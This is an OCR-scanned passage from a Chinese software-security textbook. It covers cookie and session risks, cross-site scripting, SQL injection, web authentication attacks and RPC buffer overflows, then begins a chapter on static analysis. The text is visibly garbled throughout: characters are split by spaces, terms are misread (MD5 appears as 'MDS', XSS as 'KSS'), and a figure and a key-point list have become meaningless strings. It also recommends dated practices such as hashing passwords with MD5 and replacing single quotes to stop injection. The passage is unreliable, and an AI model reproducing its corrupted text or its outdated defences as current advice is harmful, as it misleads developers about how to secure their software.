此 Cookie 可 用 来 减轻 用 户 一 些 验 证 工作 的 输入 负担 ， 比 如 用 户 名 和 密码 的 输入 , 就 可 以 在 第 

-次 登录 成 功 之 后 ,将 用 户 名 和 密码 保存 在 客户 端 Cookie， 下 次 不 必 和 输入。 当然, 这 不 安全 ， 
但 对 于 一 些 安全 要 求 不 高 的 网 站 ，Cookie 还 是 大 有 用 武之 地 。 

2) Cookie 可 以 帮助 服务 器 端 保存 多 个 状态 信息 ， 但 不 用 服务 器 端 专门 分 配 存储 资源 , 减 
轻 了 服务 器 端的 负担 。 比 如 网 上 商店 中 的 购物 车 ， 必 须 将 物品 和 具体 客户 名 绑 定 ， 但 是 放 在 
服务 器 端 又 需要 占据 大 量 资源 的 情况 下 ,可 以 用 Cookie 来 实现 , 将 每 个 物品 和 客户 的 内 容 作 
为 Cookie 保存 在 客户 端 。 

3) Cookie 可 持久 保持 一 些 与 客户 相关 的 信息 。 如 很 多 网 站 上 ， 客户 可 自主 设计 自己 的 个 
性 化 主页 ， 其 作用 是 避免 用 户 每 次 都 需要 去 找 自己 喜爱 的 内 容 , 设计 好 后 ， 下 次 打开 该 网 址 ， 
主页 上 显示 的 是 客户 设置 好 的 界面 。 如 果 这 些 设置 信息 保存 在 服务 器 端 ， 就 会 消耗 服务 器 端 
资源 ， 因 此 可 将 客户 的 个 性 化 设计 保存 在 Cookie 内 ， 每 一 次 访问 该 主页 ， 客 户 端 将 Cookie 
发 送 给 服务 器 端 ， 服 务 器 根据 Cookie 的 值 来 决定 显示 给 客户 端 什么 样 的 界面 。 

解决 Cookie 安全 的 方法 有 很 多 ， 常 见 的 有 以 下 几 种 : 

1) 替代 Cookie。 将 数据 保存 在 服务 器 端 ， 可 选 的 是 session 方案 ; 

2) 及 时 删除 Cookie。 要 删除 一 个 已 经 存在 的 Cookie， 有 以 下 几 种 方法 : 

e 给 一 个 Cookie 赋 空 值 ; 
* 设置 Cookie 的 失效 时 间 为 当前 时 间 , 让 该 Cookie 在 当前 页 面 浏览 完 之 后 就 被 
删除 ; 
。 通过 浏览 器 删除 Cookie。 如 在 正中 , 可 以 选择 “工具 ”| "Internet 339i " | 830", 
在 其 中 单 击 “ 删 除 Cookies”， 就 可 以 删除 文件 夹 中 的 Cookie。 
3) 禁用 Cookie。 很 多 浏览 器 中 都 设置 了 禁用 Cookie 的 方法 ， 如 正 中 ， 可 在 “工具 ”| 
"Intemet 选项 ”|“ 隐 私 ” 中 ， 将 隐私 级 别 设置 为 禁用 Cookie. 
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前 面 几 种 方法 在 传递 数据 时 ， 有 一 个 共同 的 问题 是 内 容 都 保存 在 客户 端 ， 具 有 泄露 的 危 
险 。 如 果 在 不 考虑 服务 器 负载 的 情况 下 ， 将 数据 保存 在 服务 器 端 是 一 个 较 好 的 方案 ， 这 就 是 
session 方法 。 
session 经 常用 于 保存 用 户 登录 状态 。 比 如 用 户 登 录 成 功 之 后 要 访问 好 几 个 页 面 , 但 是 每 
个 页 面 都 需要 知道 是 哪个 用 户 在 登录 ， 此 时 就 可 以 将 用 户 的 用 户 名 保存 在 session 内 。 

在 大 项 目 中 , 有 许多 页 面 可 能 都 要 进行 session 检查 ,如 果 将 session 检查 代码 写 很 多 次 ， 
势必 出 现 大 量 重复 代码 。 针 对 该 问题 , 可 用 两 种 方法 加 以 解决 (此 处 只 是 列举 JSP 系列 中 的 解 
决 办 法 ): 

1) 将 session 检查 代码 单独 写 入 一 个 文件 ， 在 每 个 需要 检查 的 网 页 中 包含 它 。 

2) 利用 过 滤器 。 不 过 ， 并 不 是 所 有 的 语言 都 支持 过 滤器 。 关 于 过 滤器 的 知识 ， 读 者 可 以 
查阅 相关 文献 。 

以 上 内 容 主要 是 站 在 编程 角度 来 谈论 session 应 该 怎样 使 用 才 最 安全 ; 那么 , 针对 session 
的 攻击 主要 体现 在 哪里 呢 ? 

session 机 制 最 大 的 不 安全 因素 是 sessionId 可 被 攻击 者 截获 , 如 果 攻 击 者 通过 一 些 手段 知 
ji f sessionId, 由 于 sessionId 是 客户 端 寻找 服务 器 端 session 对 象 的 唯一 标识 , 攻击 者 就 有 可 
能 根据 sesionId 来 访问 服务 器 端的 session 对 象 ， 得 知 session 中 的 内 容 ， 从 而 实施 攻击 。 

在 session 机 制 中 ， 很 多 人 认为 : 只 要 浏览 器 关闭 ， 会 话 结束 ，session 就 消失 了 。 其 实 
不 然 ， 浏 览 器 关闭 ， 会 话 结束 ， 对 于 客户 端 来 说 ， 已 经 无 法 直接 再 访问 原来 的 那个 session， 
但 并 不 代表 session 在 服务 器 端 会 马上 消失 。 除非 程序 通知 服务 器 删除 一 个 session, 和 否则 服务 
器 会 一 直 保留 这 个 session 对 象 ， 直 到 session 超时 失效 ， 被 垃圾 收集 机 制 收集 。 

令 人 遗憾 的 是 ， 客 户 在 关闭 浏览 器 时 ， 一 般 不 会 通知 服务 器 。 由 于 关闭 浏览 器 不 会 导致 
session 被 删除 ， 因 此 客户 端 关 闭 后 ，session 还 未 失效 的 情况 下 ， 就 给 攻击 者 留 下 获取 session 
中 的 内 容 的 机 会 。 

虽然 sessionId 是 随机 的 长 字符 串 , 通常 比较 难 被 猜测 到 ， 这 在 某 种 程度 上 可 以 加 强 其 安 
全 性 ， 但 一 旦 被 攻击 者 获得 ， 就 可 以 进行 一 些 攻击 活动 ， 如 攻击 者 获取 客户 sessionId， 然 后 
攻击 者 自行 伪造 一 个 相同 的 sessionId， 访 问 服务 器 ， 实 际 上 等 价 于 伪装 成 该 用 户 进行 操作 。 

为 防止 以 上 因为 sessionId 泄露 而 造成 的 安全 问题 ， 可 以 采用 如 下 方法 : 

1) 在 服务 器 端 ， 可 在 客户 端 登录 系统 时 ， 尽 量 不 要 使 用 单一 的 sessionId 对 用 户 登录 进 
行 验证 。 可 以 通过 一 定 的 手段 ， 不 时 地 变更 用 户 的 sessionId; 

2) 在 客户 端 ， 应 该 在 浏览 器 关闭 时 删除 服务 器 端的 session， 也 就 是 说 在 关闭 时 必须 通 
知 服务 器 端 。 最 简单 的 方法 是 用 JavaScript 实现 。 

4. Web 跨 站 脚本 攻击 


跨 站 脚本 在 英文 中 称 为 Cross-Site Scripting， 缩 写 为 CSS。 但 由 于 层 炙 样式 表 (Cascading 
Style Sheets) 的 缩写 也 为 CSS。 因 此 ， 为 了 将 两 者 相 区 别 ， 特 将 跨 站 脚本 缩写 为 XSS。 跨 站 脚 
本 ,顾名思义 ,就 是 恶意 攻击 者 利用 网 站 漏洞 向 Web 页 面 插入 恶意 代码 ， 一 般 需 要 以 下 几 个 
条 件 : 

。 客户 端 访问 的 网 站 是 一 个 有 漏洞 的 网 站 ， 但 没有 意识 到 ; 


=l 


XSS 属于 被 动 式 攻击 。XSS 可 诱 使 Web 站 点 执行 本 来 不 属于 它 的 代码 ， 而 这 些 代码 
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在 这 个 网 站 中 通过 一 些 手段 植 入 一 段 可 以 执行 的 代码 ， 吸 引 客户 执行 (通过 鼠标 单 击 
等 ); 
客户 单 击 后 ， 代 码 执行 ， 达 到 攻击 目的 。 


攻击 者 提供 ， 攻 击 者 利用 这 些 代 码 执行 来 获取 信息 。XSS 涉及 三 方 ， 即 攻击 者 、 客 户 端 与 客 
户 端 访问 的 网 站 。XSS 的 攻击 目标 是 盗 取 客户 端的 敏感 信息 。 从 本 质 上 讲 ， 造 成 XSS 漏洞 的 
原因 是 网 站 的 Web 应 用 对 用 户 提交 请 求 参数 未 做 充分 的 检查 过 滤 。XSS 攻击 的 主要 危害 包 
括 : 盗 取 用 户 的 各 类 敏感 信息 ， 如 账号 密码 等 ， 读 取 、 算 改 、 添 加 、 删 除 企业 敏感 数据 ， 读 
取 企业 重要 的 具有 商业 价值 的 资料 ， 控 制 受害 者 机 器 向 其 他 网 站 发 起 攻击 等 。 一 些 比较 著名 


的 网 站 ， 


如 eBay， 也 曾 遭 受过 KSS 攻击 ， 有 兴趣 的 读者 可 参考 相关 资料 。 


如 何 防范 KSS 攻击 呢 ? 主要 从 网 站 开发 者 角度 和 用 户 角 度 来 阐述 。 


1) 


从 网 站 开发 者 角度 ， 需 要 : 


根据 来 自 OWASP( 开 放 应 用 安全 计划 组 织 ) 的 建议 ， 对 XSS 最 佳 的 防护 主要 体现 在 以 下 
两 个 方面 : 


2 


M 


对 于 任意 的 输入 数据 应 该 进行 验证 ， 以 有 效 检 测 攻击 ， 也 就 是 说 ， 某 个 数据 被 接受 
之 前 ， 必 须 使 用 一 定 的 验证 机 制 来 验证 所 有 输入 数据 ， 如 长 度 、 格 式 、 类 型 、 语 法 
等 ; 常见 的 方法 ， 比 如 黑 名 单 验证 ， 就 是 将 一 些 常见 的 字符 (如 “一 ”或 类 似 “script” 
的 关键 字 ) 进 行 过滤 ， 效 果 比 较 好 ;不 过 ， 该 方式 也 有 局 限 性 ， 很 容易 被 XSS 变种 攻 
击 绕 过 验证 机 制 。 

对 于 任意 的 输出 数据 ， 要 进行 适当 的 编码 ， 防 止 任何 已 成 功 注入 的 脚本 在 浏览 器 端 
运行 ， 数据 输 出 前 ， 确 保 用 户 提交 的 数据 已 被 正确 进行 编码 ， 可 在 代码 中 明确 指定 
输出 的 编码 方式 (如 ISO-8859-1)， 而 不 是 让 攻击 者 发 送 由 他 自己 编码 的 脚本 给 用 户 。 
从 网 站 用 户 角度 ， 需 要 : 

打开 一 些 Email 或 附件 、 浏 览 论坛 帖子 时 一 定 要 特别 谨慎 , 否则 有 可 能 导致 恶意 脚本 
执行 。 可 在 浏览 器 设置 中 关闭 JavaScript 来 防止 执行 恶意 脚本 ,如 下 所 示 ， 如 果 是 正 
的 话 ， 可 单 击 “ 工 具 ”|“Intemet 选项 ”|“ 安 全 ”|“ 自 定义 级 别 ” 进 行 设置 。 

增强 安全 意识 ， 只 信任 值得 信任 的 站 点 或 内 容 ， 不 要 信任 别 的 网 站 发 到 自己 信任 的 
网 站 中 的 内 容 。 

使 用 浏览 器 中 的 一 些 配 置 。 


5. SQL 注入 攻击 的 危害 


SQL 注入 在 英文 中 称 为 SQL Injection， 是 黑客 对 Web 数据 库 进 行 攻击 的 常用 手段 之 一 。 
在 这 种 攻击 方式 中 ， 恶 意 代码 被 插入 到 查询 字符 串 中 ， 然 后 将 该 字符 串 传递 到 数据 库 服务 器 
执行 ,根据 数据 库 返 回 的 结果 ， 获 得 某 些 数据 并 发 起 进一步 攻击 ， 甚 至 获取 管理 员 账 号 密码 ， 
窃取 或 算 改 系统 数据 。 

SQL 注入 攻击 的 主要 危害 包括 : 


非法 读 取 、 算 改 、 添 加 、 删 除数 据 库 中 的 数据 ; 
资 取 用 户 的 各 类 敏感 信息 ， 获 取 利益 ; 
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。 通过 修改 数据 库 来 修改 网 页 上 的 内 容 ; 

。 私自 添加 或 删除 账号 ; 

。 注入 木马 。 

由 于 SQL 注入 攻击 一 般 利用 的 是 SQL 语法 , 这 使 得 所 有 基于 SQL 语言 标准 的 数据 库 软 
件 ( 如 SQL Server. Oracle. MySQL. DB2 等 ) 都 可 能 受到 攻击 ， 并 且 攻 击 的 发 生 和 Web 编程 
语言 本 身 也 无 关 ， 如 ASP、JSP、PHP， 在 理论 上 都 无 法 完全 幸免 。 

SQL 注入 攻击 的 危险 是 比较 大 的 。 其 他 很 多 攻击 ， 如 Dos 等 ， 可 能 通过 防火 墙 等 手段 
进行 阻拦 , 但 是 对 于 SQL 注入 攻击 ， 由 于 注入 访问 是 通过 正常 用 户 端 进行 的 ， 因 此 普通 防火 
墙 对 此 不 会 发 出 警示 ,一般 只 能 通过 程序 来 控制 ， 而 SQL 攻击 一 般 可 以 直接 访问 数据 库 ， 进 
而 甚至 获得 数据 库 所 在 的 服务 器 的 访问 权 ， 因 此 危害 相当 严重 。 

以 上 问题 的 解决 方法 有 很 多 种 ， 比 较 常见 的 有 : 

1) 将 输入 中 的 单 引号 变 成 双 引号 。 这 种 方法 常用 于 解决 数据 库 输入 问题 , 同时 也 是 一 种 
对 于 数据 库 安全 问题 的 补救 措施 。 

2) 使 用 存储 过 程 。 

3) 认真 对 表单 输入 进行 校 验 ， 从 查询 变量 中 滤 去 尽 可 能 多 的 可 疑 字符 。 

可 以 利用 一 些 手段 ， 测 试 输入 字符 串 变 量 的 内 容 ， 定 义 一 种 格式 为 只 接受 的 格式 ， 只 有 
此 种 格式 下 的 数据 才能 被 接受 ， 拒 绝 其 他 输入 的 内 容 ， 如 二 进 制 数据 、 转 义 序列 和 注释 字符 
等 。 另 外 ， 还 可 对 用 户 输入 的 字符 串 变 量 进行 类 型 、 长 度 、 格 式 和 范围 验证 并 过 滤 ， 也 有 助 
于 防止 SQL 注入 攻击 。 

4) 在 程序 中 组 织 SQL 语句 时 ， 应 该 尽量 将 用 户 输入 的 字符 串 以 参数 形式 进行 包装 ， 而 
不 是 直接 嵌入 SQL 语言 。 

由 于 很 多 SQL 注入 都 把 用 户 输入 和 原始 的 SQL 语言 柑 套 组 合成 查询 语句 来 完成 攻击 ， 
而 参数 不 能 被 嵌 套 进入 SQL 查询 语言 ， 因 此 该 种 措施 可 以 在 一 定 程 度 上 防止 SQL 注入 。 不 
过 , 在 不 同 的 语言 和 产品 里 面 , 做 法 稍 有 不 同 , 如 果 使 用 Java 系列 , 可 使 用 PreparedStatement 
代替 Statement: SQL Server 数据 库 中 可 以 使 用 存储 过 程 ， 结 合 Parameters 集合 ;Parameters 
集合 提供 了 长 度 验证 和 类 型 检查 的 功能 ，Parameters 集合 内 的 内 容 将 被 视 为 字符 值 而 不 是 可 
执行 代码 ，.NET 中 ，SQL 语句 可 以 用 参数 来 包装 等 。 

5) 严格 区 分 数据 库 访问 权限 。 

在 权限 设计 中 ， 应 用 软件 的 使 用 者 一 定 要 限制 权限 ， 没 必要 赋予 他 们 对 数据 库 对 象 的 建 
立 、 删 除 等 权限 。 这 样 即使 在 收 到 SQL 注入 攻击 时 ， 有 一 些 对 数据 库 危 害 较 大 的 操作 ， 如 
DROP TABLE 等 语句 ， 也 不 会 执行 ， 可 最 大 限度 地 减少 注入 式 攻击 对 数据 库 带 来 的 危害 。 

6) 多 层 架构 下 的 防治 策略 。 

在 多 层 环境 下 ， 用 户 输入 数据 的 校 验 与 数据 库 的 查询 被 分 离 成 多 个 层次 。 此 时 应 该 采用 
以 下 方式 进行 验证 : 

e 用 户 输入 的 所 有 数据 ， 都 需要 进行 验证 ， 通 过 验证 才能 进入 下 一 层 ， 此 过 程 与 数据 

库 分 离 。 
。 没有 通过 验证 的 数据 应 该 被 数据 库 拒绝 ， 并 向 上 一 层 报告 错误 信息 。 
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7) 对 于 数据 库 敏感 的 、 
读者 可 以 参考 后 续 章 节 。 

8) 对 数据 库 查 询 中 的 出 错 信息 进行 屏蔽 , 尽量 减少 攻击 者 根据 数据 库 的 查询 出 错 信 息 来 
猜测 数据 库 特 征 的 可 能 。 

9) 由 于 SQL 注入 有 时 伴随 着 猜测 , 因此 如 果 发 现 一 个 中 不 断 进行 登录 或 短 时 间 内 不 断 
进行 查询 ， 可 以 自动 拒绝 此 IP 的 登录 ; 也 可 以 建立 攻击 者 P 地址 备案 机 制 ， 对 曾经 的 攻击 
者 卫 进 行 备案 ， 发 现 此 全 ， 直 接 拒绝 。 

10) 可 以 使 用 专业 的 漏洞 扫描 工具 来 寻找 可 受到 攻击 的 漏洞 。 

6. 避免 Web 认证 攻击 


在 Web 应 用 程序 的 安全 中 ， 认 证 是 一 个 重要 的 角色 。 对 于 一 些 受 保护 的 资源 ， 必 须 在 身 
份 验证 的 基础 上 进行 。 认 证 实际 上 属于 权限 控制 的 一 种 ， 前 面 的 章节 阐述 了 权限 控制 方面 的 
一 些 内 容 ， 与 传统 的 认证 方式 类 似 ，Web 上 流行 的 认证 类 型 主要 有 以 下 几 种 ， 可 以 归纳 为 以 
下 3 类 : 

1) 用 户 名 /密码 。 因 为 简单 ， 该 种 认证 方法 实际 上 是 当今 Web 上 最 流行 的 认证 形式 。 一 
般 情 况 下 ， 可 提供 表单 让 用 户 输入 用 户 名 /密码 ; 

2) 其 他 认证 方法 。 用 户 名 /密码 方法 也 有 一 些 脆弱 性 ， 于 是 发 明了 一 些 更 强健 的 认证 方 
法 ， 如 基于 令 牌 和 基于 证 书 的 认证 ， 许 多 Web 站 点 都 开始 为 客户 提供 这 种 认证 方法 ; 

3) 认证 服务 。 许 多 大 公司 提供 了 专门 的 认证 服务 ， 如 微软 的 Passport， 实 现 了 一 个 私有 
信息 的 管理 和 认证 协议 ， 而 一 些 Web 站 点 把 其 上 用 户 的 认证 外 包 给 这 些 认 证 服务 公司 。 

Web 认证 攻击 ， 主 要 过 程 是 利用 传统 Web 认证 机 制 的 漏洞 ， 以 各 种 攻击 形式 获取 合法 
用 户 的 身份 信息 (如 用 户 名 /密码 )， 从 而 访问 某 些 资源 、 盗 取 用 户 信息 或 控制 用 户 程序 ， 还 有 
一 种 形式 ， 就 是 利用 漏洞 来 绕 过 Web 认证 ， 对 合法 用 户 的 信息 进行 修改 ， 或 者 进行 恶意 的 数 


EN 


要 的 数据 ， 不 要 以 明文 显示 ， 要 进行 加 密 。 关 于 加 密 的 方法 ， 


据 传输 。 

Web 认证 攻击 的 方法 有 很 多 ， 用 户 可 根据 实际 情况 采用 不 同 的 手段 加 以 应 对 。 常 见 的 
Web 认证 攻击 方法 有 : 

。 用 户 名 枚 举 


。 密码 猜测 

。 密码 窃听 和 重 放 攻 击 等 

实际 上 ，Web 认证 攻击 在 很 多 情况 下 可 通过 SQL 注入 、 窃 听 等 方式 来 实行 ， 对 于 不 同 
的 Web 站 点 ， 无 法 说 明 哪 种 方法 最 好 ， 因 此 此 处 提出 几 个 安全 准则 ; 

1) 密码 在 数据 库 中 不 以 明文 存储 ， 可 以 进行 加 密 ， 如 用 MDS 算法 进行 加 密 等 ， 可 让 攻 
击 者 无 法 直接 得 知 密码 ; 

2) 建立 较 好 的 密码 策略 和 账户 锁定 策略 , 如 使 用 者 如 果 多 次 尝试 某 个 密码 , 可 以 锁定 其 
账户 ; 

3) 在 账号 和 密码 的 传输 中 ， 使 用 HTTPS 方法 来 保护 认证 的 传输 ， 这 样 可 以 较 大 程度 上 
避免 受到 窃听 和 重 放 攻 击 的 风险 ; 

4) 进行 严格 的 输入 验证 。 这 是 一 个 常见 的 主题 可 有 效 防范 很 多 种 类 的 攻击 ， 如 跨 站 脚 
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本 、SQL 注入 、 命 令 执 行 等 。 
3.28 ”远程 过 程 调用 安全 


远程 过 程 调 用 (RPC，Remote Procedure Call) 给 程序 功能 的 扩充 提供 了 较 大 的 支持 。 远 程 
过 程 调用 为 程序 的 分 布 式 应 用 开发 架构 提供 了 技术 支持 ， 不 需要 了 解 底层 网 络 通信 协议 ， 在 
应 用 层 通 过 网 络 从 远程 计算 机 程序 请 求 服务 。 

RPC 通信 模型 基于 客户 端 /服务 器 通信 模型 ， 是 一 种 同步 通信 方式 ， 即 调用 方 必 须 等 竺 
服务 器 响应 。 在 客户 端 ，RPC 为 远程 过 程 提供 了 抽象 ， 在 调用 时 ， 其 底层 消息 传递 机 制 对 客 
户 端 来 说 都 是 透明 的 。 

在 RPC 中 ， 服 务 以 过 程 形式 放 在 服务 器 端 ， 客 户 端 负责 请 求 服务 ， 服 务 器 执行 客户 端 
的 请 求 ， 运 行 被 调用 的 过 程 。 

RPC 在 整个 调用 过 程 中 需要 经 历 的 步骤 如 下 : 

。 客户 端 请 求 进行 远程 调用 ， 激 活 客 户 端 存根 ， 指 定 目标 服务 器 ; 

。 客户 端 存 根 将 被 调用 的 过 程 和 参数 打包 ， 作 为 消息 发 送 给 服务 器 ， 等 待 数 据 消 息 的 

返回 ; 

o 服务 器 接收 消息 ,服务 器 存根 根据 消息 中 的 过 程 和 参数 等 信息 ,调用 服务 器 端的 过 程 ; 

o 服务 器 将 结果 作为 消息 返回 给 客户 端 存根 ， 客 户 端 存 根 将 结果 返回 给 用 户 。 

图 3-5 是 一 个 RPC 调用 过 程 的 简单 流程 图 


APRE ) 服务 器 进程 
客户 | : Ld 
函数 ' K ] 
本 地 à! : H 
过 程 o| ao; : o| [o 
调用 ， ' : : 
MEM T 
| 句柄 


系统 调用 (2) (9) 


cen Li 和 
DONA DI bd 
LL S iy 
本 地 内 核 i 网络 通信 | 


图 3-5 RPC 调用 过 程 流程 图 


客户 端 使 用 桌面 应 用 程序 ， 很 显然 ， 为 应 对 数据 库 的 迁移 或 改变 ， 访 问 数据 库 的 代码 不 
应 写 在 客户 端 ， 否 则 会 造成 大 量 客户 端的 改变 。 此 时 ， 访 问 数据 库 的 代码 写 在 服务 器 端 ， 作 
为 方法 或 过 程 的 形式 对 外 发 布 ， 客 户 端 可 在 不 知道 服务 器 细节 、 也 不 知道 底层 通信 协议 的 基 
础 上 ， 访 问 服务 器 端的 这 些 方法 ， 就 像 调 用 自己 机 器 上 的 方法 一 样 。 客 户 端 不 必 知 道 服 务 器 
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端的 核心 代码 ， 只 需要 知道 接口 即 可 。 

RPC 的 好 处 : 

1) 给 程序 在 异 构 环境 下 进行 通信 提供 了 可 能 ， 异 构 主要 可 以 体现 在 : 

。 网 络 环境 中 的 多 种 硬件 系统 平台 ; 

。 硬件 平台 上 的 不 同系 统 软 件 ; 

。 不 同 的 网 络 协议 或 网 络 体 系 结构 连接 等 。 

2) 在 异 构 网 络 环境 下 , 需要 把 分 散在 各 地 的 计算 机 系统 集成 起 来 , 充分 利用 系统 中 分 散 
的 计算 资源 ， 由 网 络 中 的 多 台 计 算 机 协同 工作 完成 某 一 任务 ，RPC 也 给 这 种 需求 的 实现 提供 
了 可 能 。 

RPC 具有 强大 的 网 络 编程 功能 ， 给 编程 带 来 了 极 大 方便 ， 并 为 分 布 式 计算 提供 了 支持 ， 
但 仍 存在 一 些 安全 问题 。 主 要 体现 在 : 

1) 攻击 者 可 能 恶意 调用 RPC 服务 器 中 的 过 程 , 或 输入 一 些 恶意 的 数据 导致 服务 器 失效 。 

由 于 RPC 处 理 过 程 中 ， 底 层 使 用 的 仍 是 TCPAP 协议 ， 而 TCP/IP 协议 本 身 存在 缓冲 区 
溢出 的 问题 , 攻击 者 就 可 能 利用 这 一 漏洞 , 对 系统 进行 攻击 。 一 般 情 况 下 , RPC 使 用 的 是 135 
端口 (RMI 使 用 的 是 1099 端口 )。 攻 击 者 可 伪装 成 合法 客户 端 ， 向 RPC 端口 传送 信息 ， 并 让 


该 信息 溢出 服务 器 端的 RPC 缓冲 区 ， 如 果 客 户 端 发 送 的 信息 经 过 了 精心 设计 ， 那 么 足 可 以 
执行 恶意 的 代码 。 


通常 , 如果 服务 器 被 攻击 , 一 些 基于 RPC 的 服务 ,如 DCOM(Distributed Component Object 
Model， 分 布 式 组 件 对 象 模型 ) 都 将 无 法 正常 运行 。 更 有 甚 者， 攻击 者 有 可 能 获得 对 远程 服务 
器 的 完全 控制 ， 对 服务 器 随意 进行 操作 ， 如 安装 程序 、 算 改 数据 、 格 式 化 硬盘 、 创 建 用 户 或 
增加 权限 等 。 
通常 利用 以 下 方法 来 解决 此 问题 : 
。 利用 防火 墙 封 堵 端 口 。 可 以 设置 防火 墙 的 分 组 过 滤 规 则 ， 过 滤 掉 RPC 端口 和 影响 到 
DCOM 函数 调用 的 数据 包 ， 通 过 这 种 方法 ， 可 以 避免 防火 墙 内 的 系统 被 外 部 攻击 。 
。 临时 禁用 某 些 服务 ， 如 DCOM。 如 果 因为 一 些 特殊 原因 无 法 过 滤 RPC 端口 ， 也 可 临 
时 关闭 DCOM 服务 来 保证 网 络 安全 。 不 过 ， 该 方法 将 导致 系统 运行 异常 ， 因 此 一 般 
不 建议 使 用 。 有 关 方 法 可 参考 相关 文档 。 
2) 客户 端 和 服务 器 之 间 传 递 的 信息 可 能 被 窍 听 ; 攻击 者 可 能 对 传输 中 的 数据 进行 自 改 。 
在 RPC 通信 机 制 中 ， 调 用 组 件 和 返回 客户 信息 都 通过 传送 消息 进行 ， 由 于 消息 在 传送 
过 程 中 采取 的 安全 措施 比较 简单 ， 很 容易 被 非法 用 户 截 获 ， 造 成 信息 泄密 。 为 保证 网 络 系统 
中 的 消息 信息 的 安全 ， 可 采用 数据 加 密 和 解密 的 方法 来 实现 。 


33 本 章 小 结 


本 章 首先 讲述 SSDL 的 相关 知识 。 为 将 测试 计划 的 利益 最 大 化 ，SSDL 与 系统 开发 生命 
周期 进行 了 结合 。 在 项 目 起 始 阶段 ， 相 关 的 SSDL 阶段 称 作 “安全 原则 、 规 则 及 规章 ”。 这 些 
是 必须 在 早期 进行 定义 ， 而 且 被 当 作 安 全 性 实现 的 保护 性 原则 。 
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安全 需求 在 业务 分 析 和 需求 阶段 被 定义 。 安 全 需求 的 定义 涉及 所 有 的 风险 承担 者 、 需 要 
交流 的 术语 以 及 需要 进行 教育 的 人 。 

在 原型 、 设 计 和 架构 阶段 ， 安 全 小 组 通过 指导 架构 评审 、 威 胁 建 模 来 指出 所 有 潜在 的 安 
全 漏洞 ， 从 而 为 这 一 阶段 的 工作 提供 支持 。 

安全 编码 原则 有 助 于 防止 在 代码 中 潜入 安全 漏洞 。 在 软件 开发 中 , 应 始终 坚持 这 些 原则 。 
白 盒 、 黑 盒 和 灰 盒 测 试 技术 将 结合 集成 和 测试 阶段 来 开展 工作 。 在 首次 软件 构建 基本 形成 之 
后 ， 将 开展 系统 测试 。 

判定 可 利用 性 在 整个 生命 周期 都 会 进行 ， 该 活动 将 在 系统 开发 为 产品 并 进入 维护 阶段 期 
间 最 终 定案 。 在 整个 测试 生命 周期 内 ， 都 需要 对 安全 项 目 评审 和 评估 活动 进行 指导 ， 从 而 开 
展 持续 改进 活动 。 

软件 安全 部 署 所 需 考虑 的 事项 必须 实现 。 随 着 安全 测试 的 展开 , 可 对 度量 标准 进行 评价 ， 
同时 还 需要 对 最 终 评审 和 评估 活动 给 予 指导 ， 从 而 能 够 做 出 有 充分 依据 的 决策 。 

在 生命 周期 的 最 后 ， 应 完成 安全 的 应 用 程序 部 署 。 安 全 的 部 署 意味 着 软件 使 用 了 安全 的 
默认 值 进 行 安装 ， 文 件 的 许可 权限 进行 了 恰当 的 设置 ， 并 在 应 用 程序 的 配置 中 使 用 了 安全 的 
设置 。 

如 果 在 开发 时 觉得 某 部 分 会 成 为 安全 问题 ， 就 应 该 立即 对 代码 进行 修正 ， 从 而 消除 所 有 
可 能 成 为 安全 问题 的 疑虑 。 但 是 ， 如 果 软 件 已 经 部 署 ， 那 么 进行 一 次 修正 的 代价 就 变 得 非常 
高 兄 。 这 种 情况 下 ， 应 使 用 判定 可 利用 性 技术 ， 免 得 在 绝对 必要 的 情况 之 外 ， 给 用 户 带 来 额 
外 的 花费 和 工作 。 

本 章 随 后 主要 对 软件 编程 的 安全 方面 进行 了 介绍 ， 包 括 内 存 安全 、 进 程 与 线程 安全 、 异 
常 与 错误 处 理 、 输 入 安全 、 面 向 对 象 中 的 安全 、Web 编程 安全 和 远程 调用 安全 的 知识 。 

内 存 安 全 主要 讲解 缓冲 区 溢出 问题 ， 对 攻击 方式 和 应 对 方法 进行 了 介绍 。 讨 论 了 进程 与 
线程 安全 的 概念 与 区 别 ， 以 及 死 锁 的 概念 。 异 常 与 错误 是 编程 中 经 常 要 考虑 的 问题 ， 对 异常 
与 错误 的 处 理 至 关 重 要 。 对 于 输入 问题 ， 无 论 是 外 部 输入 ， 还 是 程序 内 部 数据 的 传递 ， 都 要 
进行 安全 性 检验 。 面 向 对 象 安 全 中 阐述 了 对 象 的 内 存 释 放 过 程 的 安全 和 对 象 序列 化 的 问题 。 
Web 编程 安全 介绍 了 Web 编程 中 的 URL 攻击 、 页 面 状态 值 、 跨 站 脚本 攻击 、SQL 注入 攻击 
以 及 Web 认证 攻击 的 基本 知识 。 最 后 讲述 了 远程 过 程 调 用 的 攻击 方式 和 应 对 方法 。 
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本 章 导 读 

程序 静态 分 析 (Program Static Analysis) 是 指 在 不 运行 代码 的 情况 下 对 代码 进行 评估 的 过 
程 。 静 态 分 析 非 常 强大 ， 因 为 它 允 许 对 多 种 可 能 性 进行 快速 考量 。 静 态 分 析 尤其 适合 用 于 安 
全 方面 的 检查 ， 许 多 隐藏 的 安全 问题 可 以 通过 对 大 量 代码 进行 可 靠 而 详尽 的 评估 而 被 发 现 。 
本 章 将 详细 介绍 程序 静态 分 析 的 基础 知识 。 

应 掌握 的 知识 要 点 : 

e dia M ee 

e AEAAMAGR 

e deep 

e 执行 代码 审查 

。 安全 审查 

。 静态 分 析 度 量 标准 

e 静态 分 析 中 的 常见 缺陷 

e 缓冲 区 溢出 

e 软件 漏洞 
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4.1.1 静态 分 析 的 概念 


程序 最 重要 的 属性 之 一 是 正确 性 。 长 期 以 来 ， 专 家 学 者 们 针对 如 何 保证 程序 的 正确 性 、 
尽 可 能 发 现 程序 中 各 种 潜在 的 错误 这 个 问题 提出 了 各 种 各 样 的 代码 分 析 方法 或 技术 ， 其 中 程 
序 静 态 分 析 是 最 普遍 也 是 最 常用 的 一 种 。 

程序 静态 分 析 (Program Static Analysis) 是 指 在 不 运行 代码 的 方式 下 , 通过 各 种 分 析 工 具 对 
程序 代码 进行 扫描 并 做 出 评估 的 过 程 。 

静态 分 析 主 要 具有 以 下 特点 : 

1) 不 实际 执行 程序 ， 只 是 通过 对 代码 的 静态 扫描 对 程序 进行 分 析 ; 

2) 执行 速度 快 、 效 率 高 。 
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4.1.2 ”静态 分 析 技 术 


静态 分 析 的 使 用 比 大 多 数 人 所 了 解 的 要 更 广泛 , 在 这 一 节 , 我 们 来 看 看 静态 分 析 的 方法 ， 
静态 分 析 所 拥有 的 方法 通常 包括 : 类 型 检查 、 风 格 检查 、 程 序 理解 、 程 序 验证 、 属 性 检查 、 
Bug 查找 和 安全 审查 ， 本 节 将 重点 介绍 它们 。 

1. 类 型 检查 


